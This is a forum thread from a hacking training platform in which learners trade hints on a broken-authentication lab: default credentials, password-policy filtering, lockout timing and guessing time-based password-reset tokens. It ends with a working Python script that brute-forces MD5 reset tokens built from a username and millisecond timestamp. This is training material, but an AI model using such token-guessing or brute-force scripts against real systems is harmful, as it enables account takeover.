BROKEN AUTHENTICATION module | HTB Academy

Hello everyone,

I am having the same problem as others before me:

  1. I am using the same script as posted before
  2. I create a token for htbuser and convert the given timestamp to epoch
  3. I also tried to take the timestamp and convert it to my time zone, then convert it to epoch
  4. Fed the timestamp to the script with a ±1000 ms range
  5. The script iterates 2000 times and each time creates an md5 hash of htbadmin+iteration#
  6. It sends the request and filters out all responses with the string “Wrong token”

but…

It does just that for 2000 times without returning any valid token. Nothing at all happens. So I am guessing that my mistake is at the beginning when I choose the timestamp to convert? I am using online websites or date -d ‘TIMESTAMP’ +%s for the conversion.

Can someone point me in the right direction?

Hello everyone
Who passed the “Default Credentials” part
Who can remember.
There it is necessary to redo the entire script that they propose to study in order to answer the question:
“Inspect the login page and perform a bruteforce attack. What is the valid username?”

I’m trying to put my data from the provided machine into it

The script freezes, you have to interrupt it.
and the error always appears the same:

The task is to find a suitable list.
Have a look at the page title. Can you find a vendor there?
You have to bruteforce absolutely nothing

Hmmm, that’s how it is.
Then HINT becomes logical.
Confused by their question.
Why then do they ask for “brute force attack”.

Inspect the login page and perform a bruteforce attack. What is the valid username?

Thank you for the right direction of thought

It’s still a bruteforce even with the right list?

No
You have to bruteforce absolutely nothing.
Find the right list of default passwords.

that’s still a bruteforce unless you did it without using the script but even entering them 1 by one is just manual bruteforce?

There are six entries on the list with four different user names.
You will be able to exclude two of them without further ado. So there are two possible answers left. If you start at the top, you won’t need a second try :wink:

1 Like

Well it appears I over complicated this by 1000 times. At least I learned how to process data and modify scripts lol.

After prompted PayloadBunny, it became clear that it was not necessary to use the script and brute force, and I stupidly found the answer through google, but it was no longer bruteforce, but OSINT))
But the fact that the question itself was confusing me is 100%)

1 Like

Hello!
I got hung up on the task “Bruteforcing Passwords”.
It seems nothing complicated, one question:

“Using rockyou-50.txt as password wordlist and tb user as the username, find the policy and filter out strings that don’t respect it. What is the valid password for the htb user account?”

I created my own table, defined a password policy.
Filtered out everything unnecessary.
Even the list turned out to be small.
But persistently the password, which should be correct, does not fit in any way.
Strangely simple, how did you solve this problem?

It worked!
Tell me, please, who is the expert on regular expressions.
Who can I personally write to, consult.
There are a couple of points that my grep filter has not mastered (
I had to filter out the extra passwords a little manually.
Everything worked out, but I want to close this topic completely for myself.

Yes, who can tell ьу, for the delay in the attack in BurpSuit, which parameter is responsible.
Bypass timing protection.

Error Handling?

Hi, I am on the skills assessment and am quite stuck from the start… I am attempting to brute force support login, with a 30 sec dely between each req to prevent the lockout and trying to decode the cookie but I am stuck on that as well. any hints? happy to talk over dm’s or discord. Thanks!

Did you find the solution to this problem?

1 Like

Hi I’m stuck with the first question in the course around default credentials .

I have modified the given script which takes in a csv file fine and I have used all combinations from the all technologies listed here: https://github.com/scadastrangelove/SCADAPASS/blob/master/scadapass.csv. I also believe that row 12 relates to the technology here.

Where the question says, “Inspect the login page and perform a bruteforce attack. What is the valid username?” I’m taking the question to actually mean: do a bruteforce by hand, just trying a small set of credentials from the link above to deduce the username only ( the PW is not even relevant).

Based on row 12 of the csv in the link above, this looks pretty simple; but doesn’t work. :confused:

Presupposing I understand this all correctly, Would someone be so kind to tell me, What am I missing, please? …and put me out of my misery.

Warm regards :slight_smile:

I got it!

1 Like

I am stuck at this need help

2 Likes

About the Reset Token:
It took me 2 days to get all the details right!
How i solved it:
– The Token formation schema is the same as the CVE indeed
– Python Script Implementing Threads (you will send a couple thousand of requests)
– “Epoch in Milliseconds” is int(round(time.time() * 1000) in Python
– Fire the first request (htbuser) to create and then fire the guessings for the htbadmin in the script
– i did use a wider interval T-2000 T+2000
Obs: you wont be able to match the HTBUSER token unless you know exactly the milliseconds when it was created (and you dont need it, dont waste time with that).

1 Like

It’s one of those assignments that takes a couple of tries.
I wasn’t sure how the php code in the module example was creating the hashes, so i got to an online php sandbox an experimented with a couple of lines of codes to figure it out.
After having some ideas, modified the module’s python script to compute the hashes for the htbuser user and compared it with the one generated in the question page. Once i got a hit, it confirmed the way it was computing the hashes. Modified the script it to htbadmin user, got it running and pressed the button to generate the token again.
Then it was just a matter of waiting.

1 Like

#!/usr/bin/python3
from hashlib import md5
import requests
from sys import exit
from time import time
url = “http://ip:port/question1/”

now = 1703489410000
start_time = 1703489408000 # -2 seconds
end_time = 1703489412000 # +2 seconds
fail_text = “Wrong token”
username = “htbadmin”

loop from start_time to now. + 1 is needed because of how range() works

for x in range(start_time, end_time + 1):
# get token md5
timestamp = str(x)
md5_token = md5((username + timestamp).encode()).hexdigest()
data = {
“submit”: “check”,
“token”: md5_token
}

print("checking {} {}".format(str(x), md5_token))

# send the request
res = requests.post(url, data=data)

# response text check
if not fail_text in res.text:
    print(res.text)
    print("[*] Congratulations! raw reply printed before")
    exit()


time stamp in milliseconds convert from https://www.epochconverter.com/
python reset_token-time.py
wait for exceute 4-8 munuit